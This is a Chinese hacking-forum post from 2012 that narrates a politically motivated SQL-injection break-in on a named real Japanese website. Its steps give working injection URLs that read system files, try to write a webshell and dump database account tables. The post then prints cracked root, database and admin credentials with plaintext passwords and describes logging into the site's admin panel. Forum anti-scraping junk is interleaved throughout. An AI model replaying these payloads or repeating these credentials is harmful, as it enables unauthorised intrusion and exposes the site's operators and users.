中国网络渗透测试联盟
标题:
原创 检测汉奸站全过程
[打印本页]
作者:
xiancda
时间:
2012-9-17 16:22
标题:
原创 检测汉奸站全过程
补:
www.zuaa.jp
测试
4 M% }& _/ G# U; y
K% K% c3 I3 \4 k6 s! h$ r' K; R/ ]
0x01. 检测
www.zuaa.jp
收集数据
1 R! b) N) k: H1 A* H
[attach]73[/attach]
* S/ N# n x% ]
9 h2 w8 s; W9 l
whatweb
* y2 ^# ]) `) m' x. y0 Y. @
[attach]74[/attach]
4 n1 B$ a6 {" o2 }; p( _9 T# s f
0 Q0 R& y: `0 I$ K0 V. a) J' u
利用NMAP扫描
1 O) ~4 ~' n! S& x
[attach]75[/attach]
8 Z5 U! r) G- m* x& w( N% i
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
0 M5 P5 l2 V9 Z9 o
0x02.找注入点
- Q* @6 I# `7 p
找注入点:
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
1 E: E& ]: G5 S" H& r$ I3 ?
[attach]76[/attach]
* y7 j# s( i0 S4 Y
( m1 K1 A2 Y2 {% u. ?2 D) {
0x03.order by
0 |+ a' }+ E1 O( ^
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
order by 1
( n' F' \4 \* m8 P W; ~5 a
[attach]77[/attach]
/ ^0 ]! I) @( U; d8 K
order by 28报错,order by 27正常
/ _/ E8 q. e% S2 f% A, S/ ?" p
. D. N5 d- P4 o _" S
0x04. union手动查询
( Z0 h1 o5 ?. p* P
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
! w, x6 H2 m$ T+ r4 R( i1 W
添加到 27 时正常显示
a4 |0 u* f1 @
[attach]78[/attach]
" F0 s) P/ f; @6 v' }
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
7 w. }9 u1 i: }) r; R) a; ?' K' n
8 U" P5 R2 r8 {; j% G- u
0x05. info:
( j- I1 M) [! e+ K
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
* X- z& X/ A- V) `+ T* @; W
[attach]79[/attach]
0 h, e1 \2 Y: ~; e1 } M
user: root@localhost
' V& l- [/ X- n
database: openpne
4 R- d. ^# T+ S8 d
version: 4.1.22
1 I: B" ]8 M& W4 w3 C- e
os: portbld-freebsd5.4
5 C: X1 Z) o. y$ G _
2 U Z8 }6 B/ i! R
0x06. root用户
, U) d1 a+ S$ h9 Y
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
( G; D2 G5 n/ W0 F
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
- T1 ^/ |3 ^; p8 G, |
[attach]80[/attach]
* t2 C4 _% Y* R7 z7 a& c. c- E1 A
通过工具转换
0 C- B; \( A4 ?) y
[attach]81[/attach]
& B/ k& v; i, r- ~: ^( s
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
/ B+ j, J: z' u+ W
- I2 X( T" A1 N& C V' h! R
0x07. 利用 into outfile
& ?' b+ w1 T7 G* r% ?: {+ \ _
全部都失败
! `) F, B9 e1 V6 L0 y) c1 L2 I
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
* m+ B3 l8 z K# ?7 L
; j+ ` c H# S4 U# }
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
4 N+ O* k, `' r
* U# n' J" \5 ^& c) ]3 p! F
页面显示“MDB2 Error:syntax error”
4 f9 T0 ]* L2 I: l# D; ?% o
: s. {" J" p4 l5 f+ ^
0x08. 利用 mysql 4.1
/ W9 ^! T. B; I' o% X( F: w
猜常规表名,字段未果 工具 sqlmap
" Z! L* J; |' M+ Q8 M
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
& D* l3 E4 {! L: X$ k
5 {; h" G! ^8 Z3 ~) Q, Y& q/ ]
[attach]82[/attach]
8 U( g' I# D; d1 @$ ~: _
" ]6 ^9 z3 A8 J' C; n$ C6 l8 r! F
0x09. 查找后台
( p Q, }0 U2 A) Y) o8 `
利用 现有的各种 后台工具尝试都不行
0 Z: o8 \+ }' p; f1 j( }
% U+ |; o% M5 W
0x10. MySL外联方法
5 s- l4 z* J6 ^# E* v
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连
www.zuaa.jp
不行
6 l' l9 o; \4 D) m* ?* t4 w: Y
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
- l- F% V# J& {0 S& ^- m6 E6 G
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
* W$ t0 t, v0 y
[attach]83[/attach]
/ [. [! s% G$ {" t8 D# N* T8 ?& c
这个可以在
www.cmd5.com
解密
0 l: w2 D. [7 r3 E& K) f
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
$ K+ k, H1 ?+ ?* i$ d" H
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
) `% L4 Y! e: z2 L: ~
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
1 ^! J& A' Y. t3 W9 S) u
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
; |8 {: N8 r+ o& D- b' G4 q4 o3 W, @
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
0 |+ u; S# J3 c# X# c p
[attach]84[/attach]
5 w1 F8 e3 z8 L5 y
" l/ m B+ W% M2 H' m
0x11. 网站突破
: F& t: ]8 Y# F
发现网站的源程序 openpne, google 下载 openpne 源码
1 K# X0 R) q+ M$ B |7 ]
[attach]85[/attach]
# Y& U$ }. z2 P$ E; o' n9 M& @" N1 p
$ \4 ?5 i+ \1 U8 ?. e! ]$ ]/ u1 c
0x12. 默认信息利用
; Q) A, t7 [% z& ?
http://sns.zuaa.jp/?m=admin&a=page_login
9 T2 ~9 f) H6 |+ }8 G
[attach]86[/attach]
# A( I6 U4 C" I. ?
表名 (c_admin_user) ,字段名(username,password)
* N! b; Y* }8 b9 E
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
: q9 }" a& p. i2 c: b
[attach]87[/attach]
; O( B* F( i* [4 _( A1 I
解密
4 x9 V7 C/ i* B' `; ^
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
! I& _ T' P, {, w7 F: _2 O: r. t0 ?
zuaajp:c0923ec5857796a393da99905008c176, zju1897
4 y* d( _) k, J6 ^, p- Z
) h, f0 q# r& b! V8 _8 ]
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
: h2 \0 k4 b$ E$ P$ h
~& A. P# W, Y* H) e) F9 R
0x13. 登录后台
1 i6 M9 K! M3 @* ~( y7 D
[attach]88[/attach]
/ j8 _* O$ z6 A
. Y6 x7 i5 E6 x8 D# x1 _8 I) B1 W
0 R; N$ J' o5 N, f! |9 Z
0x14. 小结
2 q8 {- X, q/ b: F9 a* v% s, B
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
( u) b4 E+ W: `6 D- o
感谢群 ----
渗透 -酷帅王子
提供注入点 提供注入点
! w" u. f* }, t: N, c" g# F8 O
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------
By DarkRain
" h! y+ C/ X( v
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
5 Q* e3 b$ e. [8 |+ N) c
% k5 f; P$ f& P+ K( g
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
9 A; H; I# i4 b7 b
作者:
荒村狂客
时间:
2012-9-19 08:27
哪个牛人 费的这劲 入侵的
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2